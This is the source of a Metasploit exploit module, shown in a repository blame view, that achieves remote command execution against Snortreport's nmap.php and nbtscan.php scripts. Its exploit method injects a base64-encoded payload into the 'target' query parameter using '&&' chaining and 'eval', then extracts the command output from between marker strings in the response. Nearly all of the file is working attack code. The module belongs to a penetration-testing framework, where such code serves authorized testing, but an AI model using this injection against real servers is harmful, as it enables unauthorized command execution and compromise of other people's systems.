metasploit-framework/modules/exploits/multi/http/snortreport_exec.rb

92 lines
2.3 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = ExcellentRanking
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
2013-08-30 21:28:54 +00:00
def initialize(info={})
super(update_info(info,
'Name' => 'Snortreport nmap.php/nbtscan.php Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in
nmap.php and nbtscan.php scripts.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Paul Rascagneres' #itrust consulting during hack.lu 2011
],
'References' =>
[
['OSVDB', '67739'],
['URL', 'http://www.symmetrixtech.com/articles/news-016.html']
],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet python',
}
},
'Platform' => %w{ linux unix },
2013-08-30 21:28:54 +00:00
'Arch' => ARCH_CMD,
'Targets' => [['Automatic',{}]],
'DisclosureDate' => 'Sep 19 2011',
'DefaultTarget' => 0
))
2013-08-30 21:28:54 +00:00
register_options(
[
OptString.new('URI', [true, "The full URI path to nmap.php or nbtscan.php", "/snortreport-1.3.2/nmap.php"]),
],self.class)
end
2013-08-30 21:28:54 +00:00
def exploit
base64_payload = Rex::Text.encode_base64(payload.encoded)
2013-08-30 21:28:54 +00:00
start = "127.0.0.1 && echo XXXXX && eval $(echo "
last = " | base64 -d) && echo ZZZZZ"
custom_payload = start << base64_payload << last
2013-08-30 21:28:54 +00:00
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI']),
'vars_get' =>
{
'target' => custom_payload
}
},10)
2013-08-30 21:28:54 +00:00
if (res)
to_print=false
already_print=false
part=res.body.gsub("<BR>","")
part.each_line do |line|
if line =~ /ZZZZZ/
to_print=false
end
if to_print == true
print(line)
end
if line =~ /XXXXX/
already_print=true
to_print=true
end
end
2013-08-30 21:28:54 +00:00
if already_print == false
print_error("This server may not be vulnerable")
end
else
print_error("No response from the server")
end
end
end